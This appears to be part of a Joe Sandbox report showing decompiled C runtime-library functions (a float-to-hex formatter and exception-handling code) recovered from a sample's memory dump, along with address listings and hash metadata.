                                                                                                                                                                          0x00a0b605
                                                                                                                                                                          0x00a0b606
                                                                                                                                                                          0x00a0b607
                                                                                                                                                                          0x00a0b60c
                                                                                                                                                                          0x00a0b60e
                                                                                                                                                                          0x00a0b611
                                                                                                                                                                          0x00a0b611
                                                                                                                                                                          0x00a0b629
                                                                                                                                                                          0x00a0b62b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b634
                                                                                                                                                                          0x00a0b637
                                                                                                                                                                          0x00a0b63a
                                                                                                                                                                          0x00a0b63c
                                                                                                                                                                          0x00a0b63e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b640
                                                                                                                                                                          0x00a0b640
                                                                                                                                                                          0x00a0b643
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b643
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b63e
                                                                                                                                                                          0x00a0b6b9
                                                                                                                                                                          0x00a0b745
                                                                                                                                                                          0x00a0b748
                                                                                                                                                                          0x00a0b74c
                                                                                                                                                                          0x00a0b755
                                                                                                                                                                          0x00a0b758
                                                                                                                                                                          0x00a0b75c
                                                                                                                                                                          0x00a0b75c
                                                                                                                                                                          0x00a0b75e
                                                                                                                                                                          0x00a0b761
                                                                                                                                                                          0x00a0b763
                                                                                                                                                                          0x00a0b765
                                                                                                                                                                          0x00a0b767
                                                                                                                                                                          0x00a0b76c
                                                                                                                                                                          0x00a0b76d
                                                                                                                                                                          0x00a0b771
                                                                                                                                                                          0x00a0b771
                                                                                                                                                                          0x00a0b775
                                                                                                                                                                          0x00a0b778
                                                                                                                                                                          0x00a0b778
                                                                                                                                                                          0x00a0b77c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b783
                                                                                                                                                                          0x00a0b5b5
                                                                                                                                                                          0x00a0b5b5
                                                                                                                                                                          0x00a0b5bc
                                                                                                                                                                          0x00a0b5bd
                                                                                                                                                                          0x00a0b5bf
                                                                                                                                                                          0x00a0b784
                                                                                                                                                                          0x00a0b788
                                                                                                                                                                          0x00a0b788
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID: *?
                                                                                                                                                                          • API String ID: 269201875-2564092906
                                                                                                                                                                          • Opcode ID: 8eeada0755a709b941edd528342fd6c903b84761ea19406da5e8e92e77f9eb11
                                                                                                                                                                          • Instruction ID: 6db01d88544bb057f7dc8e5706d011b82759652d0419a53ead0f8dc32213a7c3
                                                                                                                                                                          • Opcode Fuzzy Hash: 8eeada0755a709b941edd528342fd6c903b84761ea19406da5e8e92e77f9eb11
                                                                                                                                                                          • Instruction Fuzzy Hash: 35612BB5D1021D9FCB14CFA9D9819EDBBF5EF88310B24816AE915E7340D731AE418BA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A052AD Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                          			E00A052AD(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E009FD21E( &_v60, _t163, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t165 = _t177 + 1;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t178 =  &(_t165[0]);
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E00A134A0( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E00A05AC8(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t118 = _t178 - 1;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E009FA270(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E00A134A0( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E00A134C0();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E00A134C0();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E00A134C0();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E00A055BC(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E00A136E0(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E009FEBAB(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E009FCBCF();
				goto L66;
			}


























































                                                                                                                                                                          0x00a052ad
                                                                                                                                                                          0x00a052b8
                                                                                                                                                                          0x00a052bd
                                                                                                                                                                          0x00a052bf
                                                                                                                                                                          0x00a052bf
                                                                                                                                                                          0x00a052c3
                                                                                                                                                                          0x00a052cc
                                                                                                                                                                          0x00a052ce
                                                                                                                                                                          0x00a052d3
                                                                                                                                                                          0x00a052d6
                                                                                                                                                                          0x00a052d9
                                                                                                                                                                          0x00a052ef
                                                                                                                                                                          0x00a052f2
                                                                                                                                                                          0x00a052f7
                                                                                                                                                                          0x00a05301
                                                                                                                                                                          0x00a05306
                                                                                                                                                                          0x00a0535d
                                                                                                                                                                          0x00a0535f
                                                                                                                                                                          0x00a0536e
                                                                                                                                                                          0x00a05371
                                                                                                                                                                          0x00a05374
                                                                                                                                                                          0x00a05376
                                                                                                                                                                          0x00a0537d
                                                                                                                                                                          0x00a0538f
                                                                                                                                                                          0x00a05392
                                                                                                                                                                          0x00a05397
                                                                                                                                                                          0x00a0539b
                                                                                                                                                                          0x00a0539c
                                                                                                                                                                          0x00a053bc
                                                                                                                                                                          0x00a053bf
                                                                                                                                                                          0x00a053bf
                                                                                                                                                                          0x00a053bf
                                                                                                                                                                          0x00a053c1
                                                                                                                                                                          0x00a053c1
                                                                                                                                                                          0x00a053c4
                                                                                                                                                                          0x00a053c7
                                                                                                                                                                          0x00a053c9
                                                                                                                                                                          0x00a053da
                                                                                                                                                                          0x00a053cb
                                                                                                                                                                          0x00a053cb
                                                                                                                                                                          0x00a053cb
                                                                                                                                                                          0x00a053dc
                                                                                                                                                                          0x00a053e1
                                                                                                                                                                          0x00a053e1
                                                                                                                                                                          0x00a053e6
                                                                                                                                                                          0x00a053e9
                                                                                                                                                                          0x00a053f3
                                                                                                                                                                          0x00a053f5
                                                                                                                                                                          0x00a053f7
                                                                                                                                                                          0x00a053fc
                                                                                                                                                                          0x00a053fd
                                                                                                                                                                          0x00a05400
                                                                                                                                                                          0x00a05403
                                                                                                                                                                          0x00a05406
                                                                                                                                                                          0x00a05406
                                                                                                                                                                          0x00a05408
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0541f
                                                                                                                                                                          0x00a05426
                                                                                                                                                                          0x00a0542a
                                                                                                                                                                          0x00a0542d
                                                                                                                                                                          0x00a05430
                                                                                                                                                                          0x00a05432
                                                                                                                                                                          0x00a05432
                                                                                                                                                                          0x00a05432
                                                                                                                                                                          0x00a05438
                                                                                                                                                                          0x00a0543b
                                                                                                                                                                          0x00a0543f
                                                                                                                                                                          0x00a05441
                                                                                                                                                                          0x00a05445
                                                                                                                                                                          0x00a05448
                                                                                                                                                                          0x00a0544b
                                                                                                                                                                          0x00a0544c
                                                                                                                                                                          0x00a0544f
                                                                                                                                                                          0x00a05452
                                                                                                                                                                          0x00a05455
                                                                                                                                                                          0x00a05455
                                                                                                                                                                          0x00a0545a
                                                                                                                                                                          0x00a0545d
                                                                                                                                                                          0x00a05460
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05469
                                                                                                                                                                          0x00a0546e
                                                                                                                                                                          0x00a05471
                                                                                                                                                                          0x00a05473
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05477
                                                                                                                                                                          0x00a0547a
                                                                                                                                                                          0x00a0547b
                                                                                                                                                                          0x00a0547b
                                                                                                                                                                          0x00a0547d
                                                                                                                                                                          0x00a05480
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05482
                                                                                                                                                                          0x00a05485
                                                                                                                                                                          0x00a0548c
                                                                                                                                                                          0x00a0548f
                                                                                                                                                                          0x00a05492
                                                                                                                                                                          0x00a054a7
                                                                                                                                                                          0x00a054a7
                                                                                                                                                                          0x00a054a7
                                                                                                                                                                          0x00a05494
                                                                                                                                                                          0x00a05494
                                                                                                                                                                          0x00a05497
                                                                                                                                                                          0x00a054a1
                                                                                                                                                                          0x00a054a1
                                                                                                                                                                          0x00a05499
                                                                                                                                                                          0x00a0549c
                                                                                                                                                                          0x00a0549c
                                                                                                                                                                          0x00a054a3
                                                                                                                                                                          0x00a054a3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05492
                                                                                                                                                                          0x00a05487
                                                                                                                                                                          0x00a05487
                                                                                                                                                                          0x00a05489
                                                                                                                                                                          0x00a05489
                                                                                                                                                                          0x00a053eb
                                                                                                                                                                          0x00a053eb
                                                                                                                                                                          0x00a053ed
                                                                                                                                                                          0x00a054aa
                                                                                                                                                                          0x00a054aa
                                                                                                                                                                          0x00a054ac
                                                                                                                                                                          0x00a054ae
                                                                                                                                                                          0x00a054b1
                                                                                                                                                                          0x00a054b2
                                                                                                                                                                          0x00a054b3
                                                                                                                                                                          0x00a054b4
                                                                                                                                                                          0x00a054bc
                                                                                                                                                                          0x00a054bc
                                                                                                                                                                          0x00a054be
                                                                                                                                                                          0x00a054be
                                                                                                                                                                          0x00a054c1
                                                                                                                                                                          0x00a054c4
                                                                                                                                                                          0x00a054c7
                                                                                                                                                                          0x00a054c9
                                                                                                                                                                          0x00a054cb
                                                                                                                                                                          0x00a054cb
                                                                                                                                                                          0x00a054d8
                                                                                                                                                                          0x00a054df
                                                                                                                                                                          0x00a054e6
                                                                                                                                                                          0x00a054e8
                                                                                                                                                                          0x00a054f1
                                                                                                                                                                          0x00a054f1
                                                                                                                                                                          0x00a054f4
                                                                                                                                                                          0x00a054f6
                                                                                                                                                                          0x00a054f9
                                                                                                                                                                          0x00a054fc
                                                                                                                                                                          0x00a05508
                                                                                                                                                                          0x00a05508
                                                                                                                                                                          0x00a0550c
                                                                                                                                                                          0x00a0550f
                                                                                                                                                                          0x00a05511
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a054fe
                                                                                                                                                                          0x00a054fe
                                                                                                                                                                          0x00a05504
                                                                                                                                                                          0x00a05504
                                                                                                                                                                          0x00a05512
                                                                                                                                                                          0x00a05512
                                                                                                                                                                          0x00a05515
                                                                                                                                                                          0x00a05519
                                                                                                                                                                          0x00a0551a
                                                                                                                                                                          0x00a0551c
                                                                                                                                                                          0x00a0551e
                                                                                                                                                                          0x00a05520
                                                                                                                                                                          0x00a0554a
                                                                                                                                                                          0x00a0554a
                                                                                                                                                                          0x00a0554c
                                                                                                                                                                          0x00a05559
                                                                                                                                                                          0x00a05559
                                                                                                                                                                          0x00a0555a
                                                                                                                                                                          0x00a0555b
                                                                                                                                                                          0x00a0555d
                                                                                                                                                                          0x00a0555f
                                                                                                                                                                          0x00a05564
                                                                                                                                                                          0x00a05566
                                                                                                                                                                          0x00a0556a
                                                                                                                                                                          0x00a0556d
                                                                                                                                                                          0x00a05570
                                                                                                                                                                          0x00a05572
                                                                                                                                                                          0x00a05573
                                                                                                                                                                          0x00a05573
                                                                                                                                                                          0x00a05575
                                                                                                                                                                          0x00a05575
                                                                                                                                                                          0x00a05577
                                                                                                                                                                          0x00a05584
                                                                                                                                                                          0x00a05584
                                                                                                                                                                          0x00a05585
                                                                                                                                                                          0x00a05586
                                                                                                                                                                          0x00a05588
                                                                                                                                                                          0x00a05589
                                                                                                                                                                          0x00a0558a
                                                                                                                                                                          0x00a05593
                                                                                                                                                                          0x00a05596
                                                                                                                                                                          0x00a05598
                                                                                                                                                                          0x00a05599
                                                                                                                                                                          0x00a05599
                                                                                                                                                                          0x00a0559b
                                                                                                                                                                          0x00a0559b
                                                                                                                                                                          0x00a0559b
                                                                                                                                                                          0x00a0559e
                                                                                                                                                                          0x00a055a0
                                                                                                                                                                          0x00a055a3
                                                                                                                                                                          0x00a055a5
                                                                                                                                                                          0x00a055ab
                                                                                                                                                                          0x00a055b0
                                                                                                                                                                          0x00a055b0
                                                                                                                                                                          0x00a055bb
                                                                                                                                                                          0x00a055bb
                                                                                                                                                                          0x00a05579
                                                                                                                                                                          0x00a0557b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0557d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0557f
                                                                                                                                                                          0x00a05582
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05582
                                                                                                                                                                          0x00a0554e
                                                                                                                                                                          0x00a05550
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05552
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05554
                                                                                                                                                                          0x00a05557
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05557
                                                                                                                                                                          0x00a05522
                                                                                                                                                                          0x00a05527
                                                                                                                                                                          0x00a0552d
                                                                                                                                                                          0x00a0552d
                                                                                                                                                                          0x00a0552e
                                                                                                                                                                          0x00a0552f
                                                                                                                                                                          0x00a05530
                                                                                                                                                                          0x00a05532
                                                                                                                                                                          0x00a05537
                                                                                                                                                                          0x00a05539
                                                                                                                                                                          0x00a0553b
                                                                                                                                                                          0x00a05540
                                                                                                                                                                          0x00a05543
                                                                                                                                                                          0x00a05545
                                                                                                                                                                          0x00a05548
                                                                                                                                                                          0x00a05548
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05548
                                                                                                                                                                          0x00a05529
                                                                                                                                                                          0x00a0552b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0552b
                                                                                                                                                                          0x00a05500
                                                                                                                                                                          0x00a05502
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05502
                                                                                                                                                                          0x00a054fc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a053ed
                                                                                                                                                                          0x00a053e9
                                                                                                                                                                          0x00a0539e
                                                                                                                                                                          0x00a053aa
                                                                                                                                                                          0x00a053aa
                                                                                                                                                                          0x00a053ac
                                                                                                                                                                          0x00a053b3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a053b3
                                                                                                                                                                          0x00a053ae
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a053ae
                                                                                                                                                                          0x00a05361
                                                                                                                                                                          0x00a05367
                                                                                                                                                                          0x00a05367
                                                                                                                                                                          0x00a0536a
                                                                                                                                                                          0x00a0536a
                                                                                                                                                                          0x00a0536b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0536b
                                                                                                                                                                          0x00a05363
                                                                                                                                                                          0x00a05365
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a05365
                                                                                                                                                                          0x00a05323
                                                                                                                                                                          0x00a05328
                                                                                                                                                                          0x00a0532a
                                                                                                                                                                          0x00a05337
                                                                                                                                                                          0x00a0533e
                                                                                                                                                                          0x00a05340
                                                                                                                                                                          0x00a0534b
                                                                                                                                                                          0x00a0534b
                                                                                                                                                                          0x00a0534e
                                                                                                                                                                          0x00a05350
                                                                                                                                                                          0x00a05350
                                                                                                                                                                          0x00a05354
                                                                                                                                                                          0x00a0532c
                                                                                                                                                                          0x00a0532c
                                                                                                                                                                          0x00a0532c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0532a
                                                                                                                                                                          0x00a052db
                                                                                                                                                                          0x00a052e2
                                                                                                                                                                          0x00a052e3
                                                                                                                                                                          0x00a052e5
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                          • Opcode ID: e6313e5e153888df2ac1b759c5c389dc176b851a01274b1ada4513f4e8f9537d
                                                                                                                                                                          • Instruction ID: b70946fb6e65c38660642b77c7db6842d6bc36a17960c2beea29b983bb820b1a
                                                                                                                                                                          • Opcode Fuzzy Hash: e6313e5e153888df2ac1b759c5c389dc176b851a01274b1ada4513f4e8f9537d
                                                                                                                                                                          • Instruction Fuzzy Hash: 26B14472D00A499FDB118F38D891BEFBBF6EF55350F248069E845AB282D2359E41CF61
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FB801 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                          			E009FB801(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0xa21280);
				E009F93D0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E009F9CF0(_t107, E009FA50A(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E009F9CF0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xa4618c; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xa1413c();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00A007E9(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0xa212a0);
									E009F93D0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
